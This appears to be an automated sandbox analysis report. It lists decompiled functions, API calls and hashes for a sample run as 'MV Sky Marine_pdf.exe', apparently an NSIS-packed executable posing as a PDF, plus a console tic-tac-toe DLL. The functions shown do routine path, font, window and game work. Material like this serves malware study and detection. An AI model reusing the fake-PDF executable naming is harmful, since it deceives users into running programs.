                                                                                                  				signed int _t13;
                                                                                                  				void* _t21;
                                                                                                  				signed int _t22;
                                                                                                  				signed int _t23;
                                                                                                  				signed int _t26;
                                                                                                  				signed int _t31;
                                                                                                  				intOrPtr _t47;
                                                                                                  				signed int _t49;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t57;
                                                                                                  				signed int _t59;
                                                                                                  				void* _t64;
                                                                                                  				void* _t65;
                                                                                                  				void* _t66;
                                                                                                  
                                                                                                  				_t12 = E10001530( *0x10004b38);
                                                                                                  				_t65 = _t64 + 4;
                                                                                                  				if(_t12 == 0) {
                                                                                                  					_t13 = E10001530( *0x10004b3c);
                                                                                                  					_t65 = _t65 + 4;
                                                                                                  					__eflags = _t13;
                                                                                                  					if(_t13 == 0) {
                                                                                                  						_t13 = E100012A0();
                                                                                                  						__eflags = _t13;
                                                                                                  						if(_t13 == 0) {
                                                                                                  							_t13 = E100012F0();
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_t57 =  *0x10003028; // 0x1
                                                                                                  					_t49 = _t57 & 0x80000001;
                                                                                                  					__eflags = _t49;
                                                                                                  					if(_t49 < 0) {
                                                                                                  						_t49 = (_t49 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                  						__eflags = _t49;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					__edx =  *0x10003028; // 0x1
                                                                                                  					__ecx = __edx;
                                                                                                  					__ecx = __edx & 0x80000001;
                                                                                                  					__eflags = __ecx;
                                                                                                  					if(__ecx < 0) {
                                                                                                  						__ecx = __ecx - 1;
                                                                                                  						__ecx = __ecx | 0xfffffffe;
                                                                                                  						__eflags = __ecx;
                                                                                                  					}
                                                                                                  					 *0x10004b20 = 1;
                                                                                                  				}
                                                                                                  				asm("sbb ecx, ecx");
                                                                                                  				 *0x10003028 = _t57 + 1;
                                                                                                  				_t47 = ( ~_t49 & 0xfffffffe) + 5;
                                                                                                  				 *((intOrPtr*)(0x10003000 + _t13 * 4)) = _t47;
                                                                                                  				E10001140();
                                                                                                  				__eflags =  *0x10004b20;
                                                                                                  				if( *0x10004b20 == 0) {
                                                                                                  					_push(_t47);
                                                                                                  					if( *0x10003028 <= 9) {
                                                                                                  						L4:
                                                                                                  						E10001140();
                                                                                                  						0x10004b24->X = 0x12001e;
                                                                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
                                                                                                  						E10001690("Your Turn :> ", _t59);
                                                                                                  						E10001750("%d",  &_v8);
                                                                                                  						_t59 = _v8;
                                                                                                  						_t66 = _t65 + 0xc;
                                                                                                  						if( *(0x10003000 + _t59 * 4) != 2) {
                                                                                                  							L1();
                                                                                                  							_t59 = _v8;
                                                                                                  						}
                                                                                                  						_t21 = E10001530( *0x10004b3c);
                                                                                                  						_t52 =  *0x10003028; // 0x1
                                                                                                  						_t65 = _t66 + 4;
                                                                                                  						_t22 = _t52;
                                                                                                  						if(_t59 != _t21) {
                                                                                                  							_t23 = _t22 & 0x80000001;
                                                                                                  							__eflags = _t23;
                                                                                                  							if(_t23 < 0) {
                                                                                                  								_t23 = (_t23 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                  								__eflags = _t23;
                                                                                                  							}
                                                                                                  							asm("sbb eax, eax");
                                                                                                  							 *0x10003028 = _t52 + 1;
                                                                                                  							_t26 = ( ~_t23 & 0xfffffffe) + 5;
                                                                                                  							__eflags = _t26;
                                                                                                  							 *(0x10003000 + _t59 * 4) = _t26;
                                                                                                  							E10001140();
                                                                                                  							return E10001780(__eflags);
                                                                                                  						} else {
                                                                                                  							_t31 = _t22 & 0x80000001;
                                                                                                  							if(_t31 < 0) {
                                                                                                  								_t31 = (_t31 - 0x00000001 | 0xfffffffe) + 1;
                                                                                                  							}
                                                                                                  							asm("sbb eax, eax");
                                                                                                  							 *0x10003028 = _t52 + 1;
                                                                                                  							 *(0x10003000 + _t59 * 4) = ( ~_t31 & 0xfffffffe) + 5;
                                                                                                  							E10001140();
                                                                                                  							0x10004b24->X = 0x14001e;
                                                                                                  							SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
                                                                                                  							_push("Player Wins");
                                                                                                  							goto L3;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						0x10004b24->X = 0x14001e;
                                                                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
                                                                                                  						_push("Game Draw");
                                                                                                  						L3:
                                                                                                  						E10001690();
                                                                                                  						_t65 = _t65 + 4;
                                                                                                  						__imp___getch();
                                                                                                  						exit(0);
                                                                                                  						goto L4;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					0x10004b24->X = 0x14001e;
                                                                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
                                                                                                  					E10001690();
                                                                                                  					return __imp___getch("Computer wins");
                                                                                                  				}
                                                                                                  			}




















                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,100013E5), ref: 10001820
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,100013E5), ref: 10001827
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 10001832
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition_printf
                                                                                                  • String ID: Computer wins
                                                                                                  • API String ID: 1663292651-2011947360
                                                                                                  • Opcode ID: 97838aacb384ba789bfa29b554c06510a59d182645dd0f31f59d9d2e0e37f84f
                                                                                                  • Instruction ID: bd42079b5aceb24b900082d139a1be4e18f5282492595b537eabfe2872bbeecf
                                                                                                  • Opcode Fuzzy Hash: 97838aacb384ba789bfa29b554c06510a59d182645dd0f31f59d9d2e0e37f84f
                                                                                                  • Instruction Fuzzy Hash: 8911A1B880422197F30D8B609DA53DB36A9EB483E5F154328F616811FEDB7694458B06
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405817(CHAR* _a4) {
                                                                                                  				CHAR* _t7;
                                                                                                  
                                                                                                  				_t7 = _a4;
                                                                                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                  					lstrcatA(_t7, 0x409010);
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040325C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 0040581D
                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040325C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405826
                                                                                                  • lstrcatA.KERNEL32(?,00409010), ref: 00405837
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405817
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-823278215
                                                                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                  • Instruction ID: a95e0cb8ac1e014464e85ca62376352c112a7956a554afc6d32bc34e627a9068
                                                                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                  • Instruction Fuzzy Hash: A0D0A962605A302AD30236159C09E8F3A08CF12300B048833F640BA292C23C1C818FEE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 67%
                                                                                                  			E00401D38() {
                                                                                                  				void* __esi;
                                                                                                  				int _t6;
                                                                                                  				signed char _t11;
                                                                                                  				struct HFONT__* _t14;
                                                                                                  				void* _t18;
                                                                                                  				void* _t24;
                                                                                                  				void* _t26;
                                                                                                  				void* _t28;
                                                                                                  
                                                                                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                                                  				0x40b034->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                                                                                  				 *0x40b044 = E00402A0C(3);
                                                                                                  				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                                                                  				 *0x40b04b = 1;
                                                                                                  				 *0x40b048 = _t11 & 0x00000001;
                                                                                                  				 *0x40b049 = _t11 & 0x00000002;
                                                                                                  				 *0x40b04a = _t11 & 0x00000004;
                                                                                                  				E00405D46(_t18, _t24, _t26, 0x40b050,  *((intOrPtr*)(_t28 - 0x24)));
                                                                                                  				_t14 = CreateFontIndirectA(0x40b034);
                                                                                                  				_push(_t14);
                                                                                                  				_push(_t26);
                                                                                                  				E00405C82();
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t28 - 4));
                                                                                                  				return 0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D3F
                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                  • CreateFontIndirectA.GDI32(0040B034), ref: 00401DA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirect
                                                                                                  • String ID:
                                                                                                  • API String ID: 3272661963-0
                                                                                                  • Opcode ID: 270685dac792171dcdf9d51eb1502def5d31926f699fc2ffb5e64ceeb9e89bf9
                                                                                                  • Instruction ID: b3116c7c608ef8e71e7d0cd7a5f3f1aec4dac111d89f02bbff535c5532fba0ba
                                                                                                  • Opcode Fuzzy Hash: 270685dac792171dcdf9d51eb1502def5d31926f699fc2ffb5e64ceeb9e89bf9
                                                                                                  • Instruction Fuzzy Hash: 1BF0C2B0A48280AFE71167B09F4EB9B3F64D712305F104876F251BA2E3C7BD00048BAE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403A40(void* __ecx, void* __eflags) {
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed short _t6;
                                                                                                  				intOrPtr _t11;
                                                                                                  				signed int _t13;
                                                                                                  				signed int _t16;
                                                                                                  				signed short* _t18;
                                                                                                  				signed int _t20;
                                                                                                  				signed short* _t23;
                                                                                                  				intOrPtr _t25;
                                                                                                  				signed int _t26;
                                                                                                  				intOrPtr* _t27;
                                                                                                  
                                                                                                  				_t24 = "1033";
                                                                                                  				_t13 = 0xffff;
                                                                                                  				_t6 = E00405C9B(__ecx, "1033");
                                                                                                  				while(1) {
                                                                                                  					_t26 =  *0x7a27e4;
                                                                                                  					if(_t26 == 0) {
                                                                                                  						goto L7;
                                                                                                  					}
                                                                                                  					_t16 =  *( *0x7a27b0 + 0x64);
                                                                                                  					_t20 =  ~_t16;
                                                                                                  					_t18 = _t16 * _t26 +  *0x7a27e0;
                                                                                                  					while(1) {
                                                                                                  						_t18 = _t18 + _t20;
                                                                                                  						_t26 = _t26 - 1;
                                                                                                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						if(_t26 != 0) {
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						goto L7;
                                                                                                  					}
                                                                                                  					 *0x7a1f80 = _t18[1];
                                                                                                  					 *0x7a2848 = _t18[3];
                                                                                                  					_t23 =  &(_t18[5]);
                                                                                                  					if(_t23 != 0) {
                                                                                                  						 *0x7a1f7c = _t23;
                                                                                                  						E00405C82(_t24,  *_t18 & 0x0000ffff);
                                                                                                  						SetWindowTextA( *0x79ed78, E00405D46(_t13, _t24, _t26, 0x7a1fa0, 0xfffffffe));
                                                                                                  						_t11 =  *0x7a27cc;
                                                                                                  						_t27 =  *0x7a27c8;
                                                                                                  						if(_t11 == 0) {
                                                                                                  							L15:
                                                                                                  							return _t11;
                                                                                                  						}
                                                                                                  						_t25 = _t11;
                                                                                                  						do {
                                                                                                  							_t11 =  *_t27;
                                                                                                  							if(_t11 != 0) {
                                                                                                  								_t11 = E00405D46(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                                  							}
                                                                                                  							_t27 = _t27 + 0x418;
                                                                                                  							_t25 = _t25 - 1;
                                                                                                  						} while (_t25 != 0);
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  					L7:
                                                                                                  					if(_t13 != 0xffff) {
                                                                                                  						_t13 = 0;
                                                                                                  					} else {
                                                                                                  						_t13 = 0x3ff;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}

                                                                                                  0x00403aa3
                                                                                                  0x00403aa8
                                                                                                  0x00403ab1
                                                                                                  0x00403aaa
                                                                                                  0x00403aaa
                                                                                                  0x00403aaa
                                                                                                  0x00403aa8

                                                                                                  APIs
                                                                                                  • SetWindowTextA.USER32(00000000,007A1FA0), ref: 00403AD8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $1033
                                                                                                  • API String ID: 530164218-3230575046
                                                                                                  • Opcode ID: 6ca1e07f4f6f048d78a45ddfc5f1b12e3c6f0990ccb150b26f1ff58d632b7665
                                                                                                  • Instruction ID: 835eaf96e6078b83d2888eeaa02e7bd7f90582720093d8bf5748709f1fda60b2
                                                                                                  • Opcode Fuzzy Hash: 6ca1e07f4f6f048d78a45ddfc5f1b12e3c6f0990ccb150b26f1ff58d632b7665
                                                                                                  • Instruction Fuzzy Hash: E611D175B046119FD7209F15DC809337BACEBC6755328823BE942A73A1C73D9E028E68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404F60(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                  				long _t22;
                                                                                                  
                                                                                                  				if(_a8 != 0x102) {
                                                                                                  					if(_a8 != 0x200) {
                                                                                                  						_t22 = _a16;
                                                                                                  						L7:
                                                                                                  						if(_a8 == 0x419 &&  *0x79ed88 != _t22) {
                                                                                                  							 *0x79ed88 = _t22;
                                                                                                  							E00405D24(0x79eda0, 0x7a3000);
                                                                                                  							E00405C82(0x7a3000, _t22);
                                                                                                  							E0040140B(6);
                                                                                                  							E00405D24(0x7a3000, 0x79eda0);
                                                                                                  						}
                                                                                                  						L11:
                                                                                                  						return CallWindowProcA( *0x79ed90, _a4, _a8, _a12, _t22);
                                                                                                  					}
                                                                                                  					if(IsWindowVisible(_a4) == 0) {
                                                                                                  						L10:
                                                                                                  						_t22 = _a16;
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_t22 = E004048DF(_a4, 1);
                                                                                                  					_a8 = 0x419;
                                                                                                  					goto L7;
                                                                                                  				}
                                                                                                  				if(_a12 != 0x20) {
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  				E0040402C(0x413);
                                                                                                  				return 0;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 00404F96
                                                                                                  • CallWindowProcA.USER32 ref: 00405004
                                                                                                    • Part of subcall function 0040402C: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040403E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 56db4a1e9125a8ea3acf90020d7134a33c4515938cf1c18d3ae574c1a67c6e35
                                                                                                  • Instruction ID: 4aeb67807fdb1cb12a88b80debadbfe2652d5d8b7ce58ed4c08cf84036e88e3c
                                                                                                  • Opcode Fuzzy Hash: 56db4a1e9125a8ea3acf90020d7134a33c4515938cf1c18d3ae574c1a67c6e35
                                                                                                  • Instruction Fuzzy Hash: 94118F7160420AFBEF219F51DD8499B3769EF94354F00803BFA04791D1C77D4D51ABA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 53%
                                                                                                  			E004058F8(void* __eflags, intOrPtr _a4) {
                                                                                                  				int _t11;
                                                                                                  				signed char* _t12;
                                                                                                  				intOrPtr _t18;
                                                                                                  				intOrPtr* _t21;
                                                                                                  				void* _t22;
                                                                                                  
                                                                                                  				E00405D24(0x7a01a8, _a4);
                                                                                                  				_t21 = E004058AB(0x7a01a8);
                                                                                                  				if(_t21 != 0) {
                                                                                                  					E00405F86(_t21);
                                                                                                  					if(( *0x7a27b8 & 0x00000080) == 0) {
                                                                                                  						L5:
                                                                                                  						_t22 = _t21 - 0x7a01a8;
                                                                                                  						while(1) {
                                                                                                  							_t11 = lstrlenA(0x7a01a8);
                                                                                                  							_push(0x7a01a8);
                                                                                                  							if(_t11 <= _t22) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_t12 = E0040601F();
                                                                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                  								E0040585E(0x7a01a8);
                                                                                                  								continue;
                                                                                                  							} else {
                                                                                                  								goto L1;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						E00405817();
                                                                                                  						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                                                                  					}
                                                                                                  					_t18 =  *_t21;
                                                                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                  						goto L1;
                                                                                                  					} else {
                                                                                                  						goto L5;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L1:
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                    • Part of subcall function 00405D24: lstrcpynA.KERNEL32(?,?,00000400,0040331D,007A1FA0,NSIS Error), ref: 00405D31
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                                                    • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040594B
                                                                                                  • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040595B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 3248276644-1451364421
                                                                                                  • Opcode ID: 9b33f393c9906aa5ae3fd14345dcca3a932272e6c6471dc722f7dd082b1270ea
                                                                                                  • Instruction ID: 669593518fdf3d348a5a3043acb3374678987c8463d37e55929acd63b73e0dea
                                                                                                  • Opcode Fuzzy Hash: 9b33f393c9906aa5ae3fd14345dcca3a932272e6c6471dc722f7dd082b1270ea
                                                                                                  • Instruction Fuzzy Hash: 9EF028B2114D2195D722333A5C09AAF0645CDC333870A453FFCA1B12D2DA3C89538D6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 40%
                                                                                                  			E100016C0(char _a4, signed int _a8) {
                                                                                                  				void* __esi;
                                                                                                  				void* _t34;
                                                                                                  				intOrPtr* _t35;
                                                                                                  				short _t37;
                                                                                                  				struct _COORD _t41;
                                                                                                  				signed int _t43;
                                                                                                  				void* _t44;
                                                                                                  				signed int _t45;
                                                                                                  				void* _t47;
                                                                                                  
                                                                                                  				_t43 = _a8;
                                                                                                  				_t41 = 0x1f;
                                                                                                  				_t2 = _t41 - 0x15; // 0xa
                                                                                                  				_t37 = _t2;
                                                                                                  				if(_t43 > 3) {
                                                                                                  					_t6 = __esi - 4; // 0x100011fa
                                                                                                  					__ecx = _t6;
                                                                                                  					__edx = 0xaaaaaaab * __ecx >> 0x20;
                                                                                                  					__edx = 0xaaaaaaab * __ecx >> 0x20 >> 1;
                                                                                                  					0xd + __edx * 2 = 0xd + __edx * 2 + __edx;
                                                                                                  				}
                                                                                                  				_t44 = _t43 - (0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20) + ((0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20)) * 2;
                                                                                                  				if(_t44 != 0) {
                                                                                                  					_t45 = _t44 + 0xffffffff;
                                                                                                  					if(_t45 != 0) {
                                                                                                  						_t41 = 0x1f + _t45 * 8;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t19 = _t44 + 0x2f; // 0x1000122d
                                                                                                  					_t41 = _t19;
                                                                                                  				}
                                                                                                  				0x10004b24->X = _t41;
                                                                                                  				 *0x10004b26 = _t37;
                                                                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
                                                                                                  				_pop(_t43);
                                                                                                  				_a8 = _a4;
                                                                                                  				_a4 = 0x10003114;
                                                                                                  				_pop(_t47);
                                                                                                  				_t34 =  *0x10000000(1, _t43, _t47);
                                                                                                  				_t35 = E100010D0();
                                                                                                  				return  *0x10000000( *_t35,  *((intOrPtr*)(_t35 + 4)), _t34, _a4, 0,  &_a8);
                                                                                                  			}

                                                                                                  Line addresses: 0x100016c4, 0x100016c8, 0x100016cd, 0x100016cd, 0x100016d3, 0x100016d5, 0x100016d5, 0x100016dd, 0x100016df, 0x100016e8, 0x100016e8, 0x100016fb, 0x100016fd, 0x10001704, 0x10001707, 0x10001709, 0x10001709, 0x100016ff, 0x100016ff, 0x100016ff, 0x100016ff, 0x10001710, 0x10001717, 0x1000172d, 0x10001738, 0x10001739, 0x1000173c, 0x10001743, 0x10001699, 0x100016aa, 0x100016bf

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,751A0170,00000001,?,100011FE,0000004F,00000001), ref: 10001726
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,100011FE,0000004F,00000001), ref: 1000172D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition
                                                                                                  • String ID: VUUU
                                                                                                  • API String ID: 4283984680-2040033107
                                                                                                  • Opcode ID: a964d3017e93623f834dae234c1993fbf6a141eaae921d3b3dbfe0fce282430c
                                                                                                  • Instruction ID: 80c197dcec039ca50b61686d671a022bee678a06f5560ce8a5d051c816b5c030
